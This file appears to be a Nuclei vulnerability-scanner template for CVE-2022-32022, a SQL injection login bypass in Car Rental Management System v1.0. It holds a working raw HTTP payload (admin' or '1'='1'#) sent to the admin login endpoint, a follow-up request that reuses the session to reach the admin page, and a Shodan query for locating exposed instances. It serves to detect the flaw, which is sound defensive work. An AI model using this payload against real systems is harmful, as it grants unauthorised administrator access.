nuclei-templates/cves/2022/CVE-2022-32022.yaml

44 lines
1.1 KiB
YAML

id: CVE-2022-32022
info:
name: Car Rental Management System v1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32022
metadata:
verified: true
shodan-query: http.html:"Car Rental Management System"
tags: cve,cve2022,carrental,cms,sqli,login-bypass
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=admin
- |
GET /admin/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome back Administrator!'
- 'action=logout'
- 'Manage Account'
condition: and
- type: status
status:
- 200